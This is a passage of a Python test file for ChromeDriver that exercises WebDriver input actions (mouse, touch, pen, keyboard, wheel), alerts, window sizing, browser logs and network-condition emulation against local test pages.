"pointerUp", "button": 0}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}], "parameters": {"pointerType": "mouse"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) click_counts = self._driver.ExecuteScript('return window.click_counts') self.assertEquals(3, len(click_counts)) self.assertEquals(1, click_counts[0]) self.assertEquals(2, click_counts[1]) self.assertEquals(3, click_counts[2]) def testActionsMouseResetCountOnOtherButton(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("dblclick", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 10, "y": 10}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}, {"type": "pointerDown", "button": 1}, {"type": "pointerUp", "button": 1}], "parameters": {"pointerType": "mouse"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) self.assertEquals(0, len(self._driver.FindElements('tag name', 'br'))) def testActionsMouseResetCountOnMove(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("dblclick", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 10, "y": 10}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}, {"type": "pointerMove", "x": 30, "y": 10}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}], "parameters": {"pointerType": "mouse"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) self.assertEquals(0, len(self._driver.FindElements('tag name', 'br'))) def testActionsMouseDrag(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/drag.html')) target = self._driver.FindElement('css selector', '#target') # Move to center of target element and drag it to a new location. actions = ({'actions': [{ "actions": [{"duration": 32, "type": "pause"}, {"duration": 32, "type": "pause"}, {"duration": 32, "type": "pause"}], "id": "0", "type": "none" }, { 'type': 'pointer', 'actions': [ {'type': 'pointerMove', 'x': 100, 'y': 100}, {'type': 'pointerDown', 'button': 0}, {'type': 'pointerMove', 'x': 150, 'y': 175} ], 'parameters': {'pointerType': 'mouse'}, 'id': 'pointer1'}]}) time.sleep(1) self._driver.PerformActions(actions) time.sleep(1) rect = target.GetRect() self.assertAlmostEqual(100, rect['x'], delta=1) self.assertAlmostEqual(125, rect['y'], delta=1) # Without releasing mouse button, should continue the drag. actions = ({'actions': [{ "actions": [{"duration": 32, "type": "pause"}], "id": "0", "type": "none" }, { 'type': 'pointer', 'actions': [ {'type': 'pointerMove', 'x': 15, 'y': 20, 'origin': 'pointer'} ], 'parameters': {'pointerType': 'mouse'}, 'id': 'pointer1'}]}) time.sleep(1) self._driver.PerformActions(actions) time.sleep(1) rect = target.GetRect() self.assertAlmostEqual(115, rect['x'], delta=1) self.assertAlmostEqual(145, rect['y'], delta=1) # Releasing mouse button stops the drag. actions = ({'actions': [{ "actions": [{"duration": 32, "type": "pause"}, {"duration": 32, "type": "pause"}], "id": "0", "type": "none" }, { 'type': 'pointer', 'actions': [ {'type': 'pointerUp', 'button': 0}, {'type': 'pointerMove', 'x': 25, 'y': 25, 'origin': 'pointer'} ], 'parameters': {'pointerType': 'mouse'}, 'id': 'pointer1'}]}) time.sleep(1) self._driver.PerformActions(actions) time.sleep(1) rect = target.GetRect() self.assertAlmostEqual(115, rect['x'], delta=1) self.assertAlmostEqual(145, rect['y'], delta=1) def testActionsWheelScroll(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "1000px";' 'div.addEventListener("wheel", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') time.sleep(1) actions = ({"actions": [{ "type":"wheel", "actions":[{"type": "scroll", "x": 10, "y": 10, "deltaX": 5, "deltaY": 15}], "id": "wheel1"}]}) time.sleep(1) self._driver.PerformActions(actions) time.sleep(1) self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testActionsTouchTap(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("click", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 10, "y": 10}, {"type": "pointerDown"}, {"type": "pointerUp"}], "parameters": {"pointerType": "touch"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testActionsMultiTouchPoint(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( ''' document.body.innerHTML = "<div id='div' autofocus style='width:200px; height:200px'>"; window.events = []; const div = document.getElementById('div'); div.addEventListener('touchstart', event => { window.events.push( {type: event.type, x: event.touches[event.touches.length - 1].clientX, y: event.touches[event.touches.length - 1].clientY}); }); div.addEventListener('touchend', event => { window.events.push( {type: event.type}); }); ''') time.sleep(1) actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 50, "y": 50}, {"type": "pointerDown"}, {"type": "pointerUp"}], "parameters": {"pointerType": "touch"}, "id": "pointer1"}, { "type":"pointer", "actions":[{"type": "pointerMove", "x": 60, "y": 60}, {"type": "pointerDown"}, {"type": "pointerUp"}], "parameters": {"pointerType": "touch"}, "id": "pointer2"}]}) self._driver.PerformActions(actions) time.sleep(1) events = self._driver.ExecuteScript('return window.events') self.assertEquals(4, len(events)) self.assertEquals("touchstart", events[0]['type']) self.assertEquals("touchstart", events[1]['type']) self.assertEquals("touchend", events[2]['type']) self.assertEquals("touchend", events[3]['type']) self.assertAlmostEqual(50, events[0]['x'], delta=1) self.assertAlmostEqual(50, events[0]['y'], delta=1) self.assertAlmostEqual(60, events[1]['x'], delta=1) self.assertAlmostEqual(60, events[1]['y'], delta=1) self._driver.ReleaseActions() def testActionsMulti(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( ''' document.body.innerHTML = "<div id='div' autofocus style='width:200px; height:200px'>"; window.events = []; const div = document.getElementById('div'); div.addEventListener('click', event => { window.events.push( {x: event.clientX, y: event.clientY}); }); ''') # Move mouse to (50, 50). self._driver.PerformActions({'actions': [ { 'type': 'pointer', 'id': 'mouse', 'actions': [ {'type': 'pointerMove', 'x': 50, 'y': 50} ] } ]}) # Click mouse button. ChromeDriver should remember that mouse is at # (50, 50). self._driver.PerformActions({'actions': [ { 'type': 'pointer', 'id': 'mouse', 'actions': [ {'type': 'pointerDown', "button": 0}, {'type': 'pointerUp', "button": 0} ] } ]}) events = self._driver.ExecuteScript('return window.events') self.assertEquals(1, len(events)) self.assertAlmostEqual(50, events[0]['x'], delta=1) self.assertAlmostEqual(50, events[0]['y'], delta=1) # Clean up action states, move mouse back to (0, 0). self._driver.ReleaseActions() # Move mouse relative by (80, 80) pixels, and then click. self._driver.PerformActions({'actions': [ { 'type': 'pointer', 'id': 'mouse', 'actions': [ {'type': 'pointerMove', 'x': 80, 'y': 80, 'origin': 'pointer'}, {'type': 'pointerDown', "button": 0}, {'type': 'pointerUp', "button": 0} ] } ]}) events = self._driver.ExecuteScript('return window.events') self.assertEquals(2, len(events)) self.assertAlmostEqual(80, events[1]['x'], delta=1) self.assertAlmostEqual(80, events[1]['y'], delta=1) self._driver.ReleaseActions() def testActionsPenPointerEventProperties(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( ''' document.body.innerHTML = "<div>test</div>"; var div = document.getElementsByTagName("div")[0]; div.style["width"] = "100px"; div.style["height"] = "100px"; window.events = []; div.addEventListener("pointerdown", event => { window.events.push( {type: event.type, x: event.clientX, y: event.clientY, width: event.width, height: event.height, pressure: event.pressure, tiltX: event.tiltX, tiltY: event.tiltY, twist: event.twist}); }); ''') time.sleep(1) actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 30, "y": 30}, {"type": "pointerDown", "button": 0, "pressure":0.55, "tiltX":-36, "tiltY":83, "twist":266}, {"type": "pointerMove", "x": 50, "y": 50}, {"type": "pointerUp", "button": 0}], "parameters": {"pointerType": "mouse"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) time.sleep(1) events = self._driver.ExecuteScript('return window.events') self.assertEquals(1, len(events)) self.assertEquals("pointerdown", events[0]['type']) self.assertAlmostEqual(30, events[0]['x'], delta=1) self.assertAlmostEqual(30, events[0]['y'], delta=1) self.assertEquals(1.0, round(events[0]['width'], 2)) self.assertEquals(1.0, round(events[0]['height'], 2)) self.assertEquals(0.55, round(events[0]['pressure'], 2)) self.assertEquals(-36, events[0]['tiltX']) self.assertEquals(83, events[0]['tiltY']) self.assertEquals(266, events[0]['twist']) def testActionsPenPointerEventPressure(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( ''' document.body.innerHTML = "<div>test</div>"; var div = document.getElementsByTagName("div")[0]; div.style["width"] = "100px"; div.style["height"] = "100px"; window.events = []; var event_list = ["pointerdown", "pointermove", "pointerup"]; for (var i = 0; i < event_list.length; i++) { div.addEventListener(event_list[i], event => { window.events.push( {type: event.type, x: event.clientX, y: event.clientY, pressure: event.pressure, twist: event.twist}); }); } ''') time.sleep(1) actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 30, "y": 30}, {"type": "pointerDown", "button": 0, "twist":30}, {"type": "pointerMove", "x": 50, "y": 50}, {"type": "pointerUp", "button": 0}], "parameters": {"pointerType": "pen"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) time.sleep(1) events = self._driver.ExecuteScript('return window.events') self.assertEquals(4, len(events)) self.assertEquals("pointermove", events[0]['type']) self.assertAlmostEqual(30, events[0]['x'], delta=1) self.assertAlmostEqual(30, events[0]['y'], delta=1) self.assertEquals(0.0, round(events[0]['pressure'], 2)) self.assertEquals(0, events[0]['twist']) self.assertEquals("pointerdown", events[1]['type']) self.assertAlmostEqual(30, events[1]['x'], delta=1) self.assertAlmostEqual(30, events[1]['y'], delta=1) self.assertEquals(0.5, round(events[1]['pressure'], 2)) self.assertEquals(30, events[1]['twist']) self.assertEquals("pointermove", events[2]['type']) self.assertAlmostEqual(50, events[2]['x'], delta=1) self.assertAlmostEqual(50, events[2]['y'], delta=1) self.assertEquals(0.5, round(events[2]['pressure'], 2)) self.assertEquals(0, events[2]['twist']) self.assertEquals("pointerup", events[3]['type']) self.assertAlmostEqual(50, events[3]['x'], delta=1) self.assertAlmostEqual(50, events[3]['y'], delta=1) self.assertEquals(0.0, round(events[3]['pressure'], 2)) self.assertEquals(0, events[3]['twist']) def testActionsPause(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( ''' document.body.innerHTML = "<input type='text' autofocus style='width:100px; height:100px'>"; window.events = []; const input = document.getElementsByTagName("input")[0]; const listener = e => window.events.push({type: e.type, time: e.timeStamp}); input.addEventListener("keydown", listener); input.addEventListener("keyup", listener); input.addEventListener("mousedown", listener); ''') # Actions on 3 devices, across 6 ticks, with 200 ms pause at ticks 1 to 4. # Tick "key" device "pointer" device "none" device # 0 move # 1 pause 200 ms pointer down pause 100 ms # 2 "a" key down pointer up pause 200 ms # 3 "a" key up pause 200 ms # 4 "b" key down move 200 ms # 5 "b" key up actions = {'actions': [ { 'type': 'key', 'id': 'key', 'actions': [ {'type': 'pause'}, {'type': 'pause', 'duration': 200}, {'type': 'keyDown', 'value': 'a'}, {'type': 'keyUp', 'value': 'a'}, {'type': 'keyDown', 'value': 'b'}, {'type': 'keyUp', 'value': 'b'}, ] }, { 'type': 'pointer', 'id': 'mouse', 'actions': [ {'type': 'pointerMove', 'x': 50, 'y': 50}, {'type': 'pointerDown', 'button': 0}, {'type': 'pointerUp', 'button': 0}, {'type': 'pause', 'duration': 200}, {'type': 'pointerMove', 'duration': 200, 'x': 10, 'y': 10}, ] }, { 'type': 'none', 'id': 'none', 'actions': [ {'type': 'pause'}, {'type': 'pause', 'duration': 100}, {'type': 'pause', 'duration': 200}, ] } ]} self._driver.PerformActions(actions) events = self._driver.ExecuteScript('return window.events') expected_events = ['mousedown', 'keydown', 'keyup', 'keydown', 'keyup'] self.assertEquals(len(expected_events), len(events)) for i in range(len(events)): self.assertEqual(expected_events[i], events[i]['type']) if i > 0: elapsed_time = events[i]['time'] - events[i-1]['time'] self.assertGreaterEqual(elapsed_time, 200) def testReleaseActions(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( ''' document.body.innerHTML = "<input id='target' type='text' style='width:200px; height:200px'>"; window.events = []; const recordKeyEvent = event => { window.events.push( {type: event.type, code: event.code}); }; const recordMouseEvent = event => { window.events.push( {type: event.type, x: event.clientX, y: event.clientY}); }; const target = document.getElementById('target'); target.addEventListener('keydown', recordKeyEvent); target.addEventListener('keyup', recordKeyEvent); target.addEventListener('mousedown', recordMouseEvent); target.addEventListener('mouseup', recordMouseEvent); ''') # Move mouse to (50, 50), press a mouse button, and press a key. self._driver.PerformActions({'actions': [ { 'type': 'pointer', 'id': 'mouse', 'actions': [ {'type': 'pointerMove', 'x': 50, 'y': 50}, {'type': 'pointerDown', "button": 0} ] }, { 'type': 'key', 'id': 'key', 'actions': [ {'type': 'pause'}, {'type': 'pause'}, {'type': 'keyDown', 'value': 'a'} ] } ]}) events = self._driver.ExecuteScript('return window.events') self.assertEquals(2, len(events)) self.assertEquals('mousedown', events[0]['type']) self.assertAlmostEqual(50, events[0]['x'], delta=1) self.assertAlmostEqual(50, events[0]['y'], delta=1) self.assertEquals('keydown', events[1]['type']) self.assertEquals('KeyA', events[1]['code']) self._driver.ReleaseActions() events = self._driver.ExecuteScript('return window.events') self.assertEquals(4, len(events)) self.assertEquals('keyup', events[2]['type']) self.assertEquals('KeyA', events[2]['code']) self.assertEquals('mouseup', events[3]['type']) self.assertAlmostEqual(50, events[3]['x'], delta=1) self.assertAlmostEqual(50, events[3]['y'], delta=1) def testActionsCtrlCommandKeys(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript(''' document.write('<input type="text" id="text1" value="Hello World" />'); document.write('<br/>') document.write('<input type="text" id="text2">'); var text1 = document.getElementById("text1"); text1.addEventListener("click", function() { var text1 = document.getElementById("text1"); text1.value="new text"; }); ''') time.sleep(1) elem1 = self._driver.FindElement('css selector', '#text1') elem2 = self._driver.FindElement('css selector', '#text2') self.assertEquals("Hello World", elem1.GetProperty('value')) time.sleep(1) platform = util.GetPlatformName() modifier_key = u'\uE009' if platform == 'mac': modifier_key = u'\uE03D' # This is a sequence of actions, first move the mouse to input field # "elem1", then press ctrl/cmd key and 'a' key to select all the text in # "elem1", and then press 'x' to cut the text and move the mouse to input # field "elem2" and press 'v' to paste the text, and at the end, we check # the texts in both input fields to see if the text are cut and pasted # correctly from "elem1" to "elem2". actions = ({'actions': [{ 'type': 'key', 'id': 'key', 'actions': [ {'type': 'pause'}, {'type': 'pause'}, {'type': 'pause'}, {'type': 'keyDown', 'value': modifier_key}, {'type': 'keyDown', 'value': 'a'}, {'type': 'keyUp', 'value': 'a'}, {'type': 'keyDown', 'value': 'x'}, {'type': 'keyUp', 'value': 'x'}, {'type': 'keyUp', 'value': modifier_key}, {'type': 'pause'}, {'type': 'pause'}, {'type': 'pause'}, {'type': 'keyDown', 'value': modifier_key}, {'type': 'keyDown', 'value': 'v'}, {'type': 'keyUp', 'value': 'v'}, {'type': 'keyUp', 'value': modifier_key} ]}, { 'type':'pointer', 'actions':[{'type': 'pointerMove', 'x': 0, 'y': 0, 'origin': elem1}, {'type': 'pointerDown', 'button': 0}, {'type': 'pointerUp', 'button': 0}, {'type': 'pause'}, {'type': 'pause'}, {'type': 'pause'}, {'type': 'pause'}, {'type': 'pause'}, {'type': 'pause'}, {'type': 'pointerMove', 'x': 0, 'y': 0, 'origin': elem2}, {'type': 'pointerDown', 'button': 0}, {'type': 'pointerUp', 'button': 0}, {'type': 'pause'}, {'type': 'pause'}, {'type': 'pause'}, {'type': 'pause'}], 'parameters': {'pointerType': 'mouse'}, 'id': 'pointer1'} ]}) self._driver.PerformActions(actions) time.sleep(1) self.assertEquals("", elem1.GetProperty('value')) self.assertEquals("new text", elem2.GetProperty('value')) time.sleep(1) def testPageLoadStrategyIsNormalByDefault(self): self.assertEquals('normal', self._driver.capabilities['pageLoadStrategy']) def testClearElement(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) text = self._driver.ExecuteScript( 'document.body.innerHTML = \'<input type="text" value="abc">\';' 'return document.getElementsByTagName("input")[0];') value = self._driver.ExecuteScript('return arguments[0].value;', text) self.assertEquals('abc', value) text.Clear() value = self._driver.ExecuteScript('return arguments[0].value;', text) self.assertEquals('', value) def testSendKeysToInputFileElement(self): file_name = os.path.join(_TEST_DATA_DIR, 'anchor_download_test.png') self._driver.Load(ChromeDriverTest.GetHttpUrlForFile( '/chromedriver/file_input.html')) elem = self._driver.FindElement('css selector', '#id_file') elem.SendKeys(file_name) text = self._driver.ExecuteScript( 'var input = document.getElementById("id_file").value;' 'return input;') self.assertEquals('C:\\fakepath\\anchor_download_test.png', text); if not _ANDROID_PACKAGE_KEY: self.assertRaises(chromedriver.InvalidArgument, elem.SendKeys, "/blah/blah/blah") def testSendKeysToNonTypeableInputElement(self): self._driver.Load("about:blank") self._driver.ExecuteScript( "document.body.innerHTML = '<input type=\"color\">';") elem = self._driver.FindElement('tag name', 'input'); input_value = '#7fffd4' elem.SendKeys(input_value) value = elem.GetProperty('value') self.assertEquals(input_value, value) def testGetElementAttribute(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/attribute_colon_test.html')) elem = self._driver.FindElement("css selector", "*[name='phones']") self.assertEquals('3', elem.GetAttribute('size')) def testGetElementProperty(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/two_inputs.html')) elem = self._driver.FindElement("css selector", "#first") self.assertEquals('text', elem.GetProperty('type')) self.assertEquals('first', elem.GetProperty('id')) def testGetElementSpecialCharAttribute(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/attribute_colon_test.html')) elem = self._driver.FindElement("css selector", "*[name='phones']") self.assertEquals('colonvalue', elem.GetAttribute('ext:qtip')) def testGetCurrentUrl(self): url = self.GetHttpUrlForFile('/chromedriver/frame_test.html') self._driver.Load(url) self.assertEquals(url, self._driver.GetCurrentUrl()) self._driver.SwitchToFrame(self._driver.FindElement('tag name', 'iframe')) self.assertEquals(url, self._driver.GetCurrentUrl()) def testGoBackAndGoForward(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.GoBack() self._driver.GoForward() def testDontGoBackOrGoForward(self): # We need to run this test in a new tab so that it is isolated from previous # test runs. old_windows = self._driver.GetWindowHandles() self._driver.ExecuteScript('window.open("about:blank")') new_window = self.WaitForNewWindow(self._driver, old_windows) self._driver.SwitchToWindow(new_window) self.assertEquals('about:blank', self._driver.GetCurrentUrl()) self._driver.GoBack() self.assertEquals('about:blank', self._driver.GetCurrentUrl()) self._driver.GoForward() self.assertEquals('about:blank', self._driver.GetCurrentUrl()) def testBackNavigationAfterClickElement(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html')) link = self._driver.FindElement('css selector', '#l1') link.Click() self._driver.GoBack() self.assertNotEqual('data:,', self._driver.GetCurrentUrl()) self.assertEquals(self.GetHttpUrlForFile('/chromedriver/link_nav.html'), self._driver.GetCurrentUrl()) def testAlertHandlingOnPageUnload(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript('window.onbeforeunload=function(){return true}') self._driver.FindElement('tag name', 'body').Click() self._driver.GoBack() self.assertTrue(self._driver.IsAlertOpen()) self._driver.HandleAlert(True) self.assertFalse(self._driver.IsAlertOpen()) def testRefresh(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.Refresh() def testAlert(self): self.assertFalse(self._driver.IsAlertOpen()) self._driver.ExecuteScript('window.confirmed = confirm(\'HI\');') self.assertTrue(self._driver.IsAlertOpen()) self.assertEquals('HI', self._driver.GetAlertMessage()) self._driver.HandleAlert(False) self.assertFalse(self._driver.IsAlertOpen()) self.assertEquals(False, self._driver.ExecuteScript('return window.confirmed')) def testSendTextToAlert(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript('prompt = window.prompt()') self.assertTrue(self._driver.IsAlertOpen()) self._driver.HandleAlert(True, 'TextToPrompt') self.assertEquals('TextToPrompt', self._driver.ExecuteScript('return prompt')) self._driver.ExecuteScript('window.confirmed = confirm(\'HI\');') self.assertRaises(chromedriver.ElementNotInteractable, self._driver.HandleAlert, True, 'textToConfirm') self._driver.HandleAlert(True) #for closing the previous alert. self._driver.ExecuteScript('window.onbeforeunload=function(){return true}') self._driver.FindElement('tag name', 'body').Click() self._driver.Refresh() self.assertTrue(self._driver.IsAlertOpen()) self.assertRaises(chromedriver.UnsupportedOperation, self._driver.HandleAlert, True, 'textToOnBeforeUnload') def testAlertOnNewWindow(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) old_windows = self._driver.GetWindowHandles() self._driver.ExecuteScript("window.open('%s')" % self.GetHttpUrlForFile('/chromedriver/alert_onload.html')) new_window = self.WaitForNewWindow(self._driver, old_windows) self.assertNotEqual(None, new_window) self._driver.SwitchToWindow(new_window) self.assertTrue(self._driver.IsAlertOpen()) self._driver.HandleAlert(False) self.assertFalse(self._driver.IsAlertOpen()) def testShouldHandleNewWindowLoadingProperly(self): """Tests that ChromeDriver determines loading correctly for new windows.""" self._http_server.SetDataForPath( '/newwindow', """ <html> <body> <a href='%s' target='_blank'>new window/tab</a> </body> </html>""" % self._sync_server.GetUrl()) self._driver.Load(self._http_server.GetUrl() + '/newwindow') old_windows = self._driver.GetWindowHandles() self._driver.FindElement('tag name', 'a').Click() new_window = self.WaitForNewWindow(self._driver, old_windows) self.assertNotEqual(None, new_window) self.assertFalse(self._driver.IsLoading()) self._driver.SwitchToWindow(new_window) self.assertTrue(self._driver.IsLoading()) self._sync_server.RespondWithContent('<html>new window</html>') self._driver.ExecuteScript('return 1') # Shouldn't hang. def testPopups(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) old_handles = self._driver.GetWindowHandles() self._driver.ExecuteScript('window.open("about:blank")') new_window_handle = self.WaitForNewWindow(self._driver, old_handles) self.assertNotEqual(None, new_window_handle) def testNoSuchFrame(self): self.assertRaises(chromedriver.NoSuchFrame, self._driver.SwitchToFrame, 'nosuchframe') self.assertRaises(chromedriver.NoSuchFrame, self._driver.SwitchToFrame, self._driver.FindElement('tag name', 'body')) def testWindowPosition(self): rect = self._driver.GetWindowRect() self._driver.SetWindowRect(None, None, rect[2], rect[3]) self.assertEquals(rect, self._driver.GetWindowRect()) # Resize so the window isn't moved offscreen. # See https://bugs.chromium.org/p/chromedriver/issues/detail?id=297. self._driver.SetWindowRect(640, 400, None, None) self._driver.SetWindowRect(None, None, 100, 200) self.assertEquals([640, 400, 100, 200], self._driver.GetWindowRect()) def testWindowSize(self): rect = self._driver.GetWindowRect() self._driver.SetWindowRect(rect[0], rect[1], None, None) self.assertEquals(rect, self._driver.GetWindowRect()) self._driver.SetWindowRect(640, 400, None, None) self.assertEquals([640, 400, rect[2], rect[3]], self._driver.GetWindowRect()) def testWindowRect(self): old_window_rect = self._driver.GetWindowRect() self._driver.SetWindowRect(*old_window_rect) self.assertEquals(self._driver.GetWindowRect(), old_window_rect) target_window_rect = [640, 400, 100, 200] target_window_rect_dict = {'width': 640, 'height': 400, 'x': 100, 'y': 200} returned_window_rect = self._driver.SetWindowRect(*target_window_rect) self.assertEquals(self._driver.GetWindowRect(), target_window_rect) self.assertEquals(returned_window_rect, target_window_rect_dict) def testWindowMaximize(self): old_rect_list = [640, 400, 100, 200] self._driver.SetWindowRect(*old_rect_list) new_rect = self._driver.MaximizeWindow() new_rect_list = [ new_rect['width'], new_rect['height'], new_rect['x'], new_rect['y'] ] self.assertNotEqual(old_rect_list, new_rect_list) self._driver.SetWindowRect(*old_rect_list) self.assertEquals(old_rect_list, self._driver.GetWindowRect()) def testWindowMinimize(self): handle_prefix = "CDwindow-" handle = self._driver.GetCurrentWindowHandle() target = handle[len(handle_prefix):] self._driver.SetWindowRect(640, 400, 100, 200) rect = self._driver.MinimizeWindow() expected_rect = {u'y': 200, u'width': 640, u'height': 400, u'x': 100} #check it returned the correct rect for key in expected_rect.keys(): self.assertEquals(expected_rect[key], rect[key]) # check its minimized res = self._driver.SendCommandAndGetResult('Browser.getWindowForTarget', {'targetId': target}) self.assertEquals('minimized', res['bounds']['windowState']) def testWindowFullScreen(self): old_rect_list = [640, 400, 100, 200] self._driver.SetWindowRect(*old_rect_list) self.assertEquals(self._driver.GetWindowRect(), old_rect_list) new_rect = self._driver.FullScreenWindow() new_rect_list = [ new_rect['width'], new_rect['height'], new_rect['x'], new_rect['y'] ] self.assertNotEqual(old_rect_list, new_rect_list) self._driver.SetWindowRect(*old_rect_list) for i in range(10): if old_rect_list == self._driver.GetWindowRect(): break time.sleep(0.1) self.assertEquals(old_rect_list, self._driver.GetWindowRect()) def testConsoleLogSources(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/console_log.html')) logs = self._driver.GetLog('browser') self.assertEqual('javascript', logs[0]['source']) self.assertTrue('TypeError' in logs[0]['message']) self.assertEqual('network', logs[1]['source']) self.assertTrue('nonexistent.png' in logs[1]['message']) self.assertTrue('404' in logs[1]['message']) # Sometimes, we also get an error for a missing favicon. if len(logs) > 2: self.assertEqual('network', logs[2]['source']) self.assertTrue('favicon.ico' in logs[2]['message']) self.assertTrue('404' in logs[2]['message']) self.assertEqual(3, len(logs)) else: self.assertEqual(2, len(logs)) def testPendingConsoleLog(self): new_logs = [""] def GetPendingLogs(driver): response = driver.GetLog('browser') new_logs[0] = [x for x in response if x['source'] == 'console-api'] return new_logs[0] self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/pending_console_log.html')) logs = self._driver.GetLog('browser') self.assertEqual('console-api', logs[0]['source']) self.assertTrue('"InitialError" 2018 "Third"' in logs[0]['message']) self.WaitForCondition(lambda: len(GetPendingLogs(self._driver)) > 0 , 6) self.assertEqual('console-api', new_logs[0][0]['source']) self.assertTrue('"RepeatedError" "Second" "Third"' in new_logs[0][0]['message']) def testGetLogOnClosedWindow(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) old_handles = self._driver.GetWindowHandles() self._driver.FindElement('css selector', '#link').Click() self.WaitForNewWindow(self._driver, old_handles) self._driver.CloseWindow() try: self._driver.GetLog('browser') except chromedriver.ChromeDriverException as e: self.fail('exception while calling GetLog on a closed tab: ' + e.message) def testGetLogOnWindowWithAlert(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript('alert("alert!");') try: self._driver.GetLog('browser') except Exception as e: self.fail(e.message) def testDoesntHangOnDebugger(self): self._driver.Load('about:blank') self._driver.ExecuteScript('debugger;') def testChromeDriverSendLargeData(self): script = 'return "0".repeat(10e6);' lots_of_data = self._driver.ExecuteScript(script) self.assertEquals('0'.zfill(int(10e6)), lots_of_data) def testEmulateNetworkConditions(self): # Network conditions must be set before it can be retrieved. self.assertRaises(chromedriver.UnknownError, self._driver.GetNetworkConditions) # DSL: 2Mbps throughput, 5ms RTT latency = 5 throughput = 2048 * 1024 self._driver.SetNetworkConditions(latency, throughput, throughput) network = self._driver.GetNetworkConditions() self.assertEquals(latency, network['latency']); self.assertEquals(throughput, network['download_throughput']); self.assertEquals(throughput, network['upload_throughput']); self.assertEquals(False, network['offline']); # Network Conditions again cannot be retrieved after they've been deleted. self._driver.DeleteNetworkConditions() self.assertRaises(chromedriver.UnknownError, self._driver.GetNetworkConditions) def testEmulateNetworkConditionsName(self): # DSL: 2Mbps throughput, 5ms RTT # latency = 5 # throughput = 2048 * 1024 self._driver.SetNetworkConditionsName('DSL') network = self._driver.GetNetworkConditions() self.assertEquals(5, network['latency']); self.assertEquals(2048*1024, network['download_throughput']); self.assertEquals(2048*1024, network['upload_throughput']); self.assertEquals(False, network['offline']); def testEmulateNetworkConditionsSpeed(self): # Warm up the browser. self._http_server.SetDataForPath( '/', "<html><body>blank</body></html>") self._driver.Load(self._http_server.GetUrl() + '/') # DSL: 2Mbps throughput, 5ms RTT latency = 5 throughput_kbps = 2048 throughput = throughput_kbps * 1024 self._driver.SetNetworkConditions(latency, throughput, throughput) _32_bytes = " 0 1 2 3 4 5 6 7 8 9 A B C D E F" _1_megabyte = _32_bytes * 32768 self._http_server.SetDataForPath( '/1MB', "<html><body>%s</body></html>" % _1_megabyte) start = monotonic() self._driver.Load(self._http_server.GetUrl() + '/1MB') finish = monotonic() duration = finish - start actual_throughput_kbps = 1024 / duration self.assertLessEqual(actual_throughput_kbps, 